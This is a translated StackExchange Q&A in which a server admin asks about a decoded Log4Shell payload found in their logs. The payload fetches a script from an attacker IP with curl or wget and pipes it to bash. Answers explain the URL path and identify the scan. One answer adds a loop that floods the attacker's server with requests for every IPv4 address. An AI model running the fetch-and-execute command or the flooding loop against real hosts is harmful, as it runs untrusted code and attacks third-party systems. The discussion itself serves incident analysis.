curl 命令的地址中有 / 是什麼意思？

在最近的 log4j 問題之後，我正在查看我的伺服器日誌，並看到了一個有趣的命令，它是 base64 編碼的（解碼版本如下）：

(curl -s 195.54.160.149:5874/66.228.37.152:80||wget -q -O- 195.54.160.149:5874/66.228.37.152:80)|bash

我很感興趣，因為我看不到/伺服器名稱/ip 中帶有 a 的主機的 curl 命令。這是什麼意思？我想知道這是否是某種毫無意義的欺騙源 IP 的方式。也許是子網設置（對我來說也沒有意義）？

這並不意味著任何異常：斜線將主機和埠與路徑分開。

curl 195.54.160.149:5874/66.228.37.152:80

將連接到 195.54.160.149 上的 5874 埠並請求/66.228.37.152:80使用標識的資源

GET /66.228.37.152:80 HTTP/1.1

66.228.37.152:80您可以通過託管在 Web 伺服器上命名的文件來自己設置類似的內容。伺服器對路徑的實際操作取決於伺服器所有者的設置。

您正在野外看到 Log4Shell 漏洞。就像上面所說的其他人一樣，它正在警告消息來源他們發現了一個可利用的節點。您特別連結的是一個俄羅斯節點，與我的日誌中顯示的節點相同 - 我開始回復同一台伺服器，試圖掩蓋他們可能找到的任何內容。

for firstoctet in {0..255}; do
 for ip in ${firstoctet}.{0..255}.{0..255}.{0..255}; do 
   curl -s 195.54.160.149:5874/${ip}:80 
 done
done

https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html

引用自：https://unix.stackexchange.com/questions/681467